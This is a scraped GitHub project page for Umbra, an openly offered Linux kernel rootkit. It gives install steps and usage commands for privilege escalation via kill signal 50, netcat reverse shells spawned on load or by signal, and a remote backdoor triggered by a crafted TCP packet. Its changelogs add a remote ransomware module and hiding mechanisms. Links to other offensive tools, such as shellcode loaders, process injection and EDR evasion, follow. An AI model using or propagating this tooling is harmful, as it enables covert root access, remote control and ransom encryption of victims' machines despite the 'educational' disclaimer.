A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Overview

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to remote hosts and more.

The rootkit is still under development, although the features listed below are already fully operational.

Backdoor in action

Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.

Features

  • NEW: Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.
  • Privilege escalation by sending signal 50.
  • Spawn netcat reverse shell on module load.
  • Spawn netcat reverse shell to a remote host by sending signal 51.

More functionalities will come in later updates.

Disclaimer

This rookit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra does not incorporate any rootkit hiding or protection mechanisms yet.

IMPORTANT: If you are going to test this rootkit in your own machine, I strongly recommend to use a VM.

Build and install

Remember that you should have a 4.x or 5.x kernel available.

  1. Download your kernel header files
apt install linux-headers-$(uname -r)

2.Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check .vscode/c_cpp_properties.json for an example on which directories to include.

  1. Clone the project
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Build Umbra
make
  1. Load Umbra in the kernel
sudo insmod ./umbra.ko

Unloading Umbra

sudo rmmod umbra

Usage

Change current user privileges to root

  • Send signal 50 to any PID.
kill -50 1

Start reverse netcat shell to IP:PORT

  • Set your desired IP and port in CONFIG.H before building the rootkit. By default 127.0.0.1:5888

  • Start listening at the remote host.

nc -lvp 5888
  • Send signal 51 to any PID. Umbra will catch it and start the shell.
kill -51 1

Note: Umbra also tries to start the reverse shell on load.

NEW: Spawn reverse shell via backdoor

Any host can get a reverse shell by sending a specially-crafted packet to a machine infected with Umbra. The backdoor will try to open the shell on IP:5888, where IP is the IP address of the attacking machine.

You can look at the code to know how to build your own packet, but I also provide a client which will do the job for you. You can download the client from latest releases, or you can build your own using my library RawTCP.

The client is run as follows:

./client <attacker_ip> <victim_ip>

Where the attacker ip will be used by the backdoor to connect the reverse shell and the victim ip is the one of the machine infected with Umbra.

References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used: How to create LKMs:

Linux syscall reference:

Some rootkit references:

License

This project is licensed under the GPLv2 license. See LICENSE

You might also like...
This project aims to facilitate debugging a kernel driver in windows by adding support for a code change on the fly without reboot/unload, and more!
This project aims to facilitate debugging a kernel driver in windows by adding support for a code change on the fly without reboot/unload, and more!

BSOD Survivor Tired of always telling yourself when you got a BSOD that what if I could just return to the caller function which caused the BSOD, and

Isocline is a pure C library that can be used as an alternative to the GNU readline library
Isocline is a pure C library that can be used as an alternative to the GNU readline library

Isocline: a portable readline alternative. Isocline is a pure C library that can be used as an alternative to the GNU readline library (latest release

A interpreter that runs the script which is programmed in the language of FF0 script (or you can call it as Warfarin)

ff0-script A interpreter that runs the script which is programmed in the language of FF0 script (or you can call it as Warfarin) You can do it, unders

Remote Download and Memory Execute for shellcode framework
Remote Download and Memory Execute for shellcode framework

RmExecute Remote Download and Memory Execute for shellcode framework 远程下载并内存加载的ShellCode框架,暂不支持X64 参(抄)考(袭)项目 windows下shellcode提取模板的实现 主要抄袭来源,直接使用这位大佬

Beacon Object File (BOF) for remote process injection via thread hijacking

cThreadHijack ___________.__ .______ ___ .__ __ __ ___\__ ___/| |_________ ____ _____

Do u wanna create more than one trial account on exitlag? This 'spoofer' is for you!

ExitLag HWID Bypass Do you wanna create more than one trial account on exitlag? So this 'spoofer' is for you! Why? Exitlag limit the trial account cre

Panda - is a set of utilities used to research how PsExec encrypts its traffic.

Panda Panda - is a set of utilities used to research how PsExec encrypts its traffic. Shared library used to inject into lsass.exe process to log NTLM

parse sql statements as strings to be used/modified in cpp.

parse sql statements as strings to be used/modified in cpp.

The libxo library allows an application to generate text, XML, JSON, and HTML output using a common set of function calls. The application decides at run time which output style should be produced.

libxo libxo - A Library for Generating Text, XML, JSON, and HTML Output The libxo library allows an application to generate text, XML, JSON, and HTML

Comments
  • Umbra Modules update

    Umbra Modules update

    Change-log

    This update incorporates the so called Umbra Modules:

    • Umbra modules: malware-like extensions for Umbra which can be triggered via the Umbra Injector.
    • New Umbra Module "Ransom", a trivial ransomware program using a simple (very bad) encryption algorithm.
    • Ransom can be used to encrypt or decrypt a whole directory (recursively, including sub directories) remotely.
    • The rootkit backdoor now listens for the new injector requests accordingly.
    • Minor fixes.
    opened by h3xduck 0
  • Stealth update

    Stealth update

    Completed new version of Umbra, including:

    • New stable version of Umbra Injector
      • No need to start a listener anymore, managed by the client.
    • New stealth mechanisms:
      • Directories of Umbra are hidden from the user
      • Attacker can hide/unhide Umbra locally and remotely
    enhancement 
    opened by h3xduck 0
Releases(v0.4.0)
  • v0.4.0(Sep 18, 2021)

    Change-log

    Incorporated the so called Umbra Modules:

    • Umbra modules: malware-like extensions for Umbra which can be triggered via the Umbra Injector.
    • The rootkit backdoor now listens for the new injector requests accordingly.

    Ransom: A ransomware-like module

    • New Umbra Module "Ransom", a trivial ransomware program using a simple (very bad) encryption algorithm.
    • Ransom can be used to encrypt or decrypt a whole directory (recursively, including sub directories) remotely.
    • Encrypted files appear as .ubr files.

    Other changes

    • Added a script for installing Umbra and configuring the environment.
    • New explanatory gifs on the README and updated other parts.
    • Minor fixes.
    Source code(tar.gz)
    Source code(zip)
    injector(39.93 KB)
  • v0.3.0(Jun 10, 2021)

    Changelog:

    Added stealth capabilities for Umbra

    • New hooks so that the user no longer can see any file/directory of Umbra via ls or similar commands.
    • New signals to trigger Umbra's visibility by lsmod commands and similar. Umbra no longer can be removed by rmmod in invisible mode.
    • Improvements in the backdoor: New payloads are recognized for new functionalities of the Umbra Injector.

    Major update of the Umbra Injector

    • Possible to get a reverse shell remotely just with the client, no longer need of starting a separate netcat listener.
    • New modes: Hiding/unhiding the rootkit remotely.
    • New getopt system, with help manual.
    Source code(tar.gz)
    Source code(zip)
    client(39.35 KB)
  • v0.2.0(May 9, 2021)

    Changelog:

    Incorporated network backdoor which will spawn a reverse shell to a remote host when receiving a malicious TCP packet.

    • Added netfilter hooks.
    • Module for processing network packets.

    Added a client to trigger the backdoor remotely.

    • Using my library RawTCP.

    Other changes.

    • Updated README and added examples.
    • Fixed some bugs
    Source code(tar.gz)
    Source code(zip)
    client(34.63 KB)
  • v0.1.0(Apr 25, 2021)

    Changelog:

    • Added ftrace hooks for kill
    • Privilege escalation for kill signals
    • Netcat reverse shell added
    • Start reverse shell with kill signal
    • Created functional LKM.
    • In general, just added all base code for the project.
    Source code(tar.gz)
    Source code(zip)
Owner
Marcos S. Bajo
CSE Student at UC3M. Free software advocate and cybersecurity enthusiast.
Marcos S. Bajo
SPAWN - Cobalt Strike BOF

Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.

Bobby Cooke 347 Oct 4, 2022
A simple Windows kernel rootkit.

Venom RootKit A simple windows rootkit that I have wrote, In order to explore a bit about the world of rootkits and windows kernel in general. The Ven

Amit Schendel 63 Sep 27, 2022
UClamp backports and custom tunings for different kernel versions/devices

Linux kernel ============ This file was moved to Documentation/admin-guide/README.rst Please notice that there are several guides for kernel develop

null 25 Jan 14, 2022
the checkra1n set of tools targeting bare metal, Linux and Windows

Universal toolchain Low-effort cross-compiling for the masses. What's Universal toolchain? It's a collection of sysroots and shell scripts in such a w

null 63 Sep 9, 2022
KeyScan is a C++ open source explanation tool targeting windows operating system.

KeyScan is a C++ open source explanation tool targeting windows operating system. it allows you to send keyboard events, mouse events and capture keystrokes (keylogger).!

null 15 Sep 21, 2022
Thor is a DoS(slowloris) tool which can be used against a target.

Thor is a DoS(slowloris) tool which can be used against a target. It does this by continuously sending partial HTTP requests, none of which are completed.

AnonabdulJ 1 Nov 6, 2021
Winsock accept() Backdoor Implant.

WSAAcceptBackdoor This project is a POC implementation for a DLL implant that acts as a backdoor for accept Winsock API calls. Once the DLL is injecte

Ege Balcı 109 Sep 18, 2022
An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples

rootkit-arsenal-guacamole An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples All projects have been por

Matteo Malvica 52 Sep 24, 2022
Windows x64 rootkit

P4tch3r Windows x64 rootkit (tested on Windows 7) It's PoC of patching NtTerminateProcess function by just overwriting instructions catching arguments

null 7 Jul 22, 2022
yark - Yet Another RootKit

yark - Yet Another RootKit How to Build Requirements In order to build the kernel module, you need to install the kernel-headers package corresponding

imlk 17 Sep 8, 2022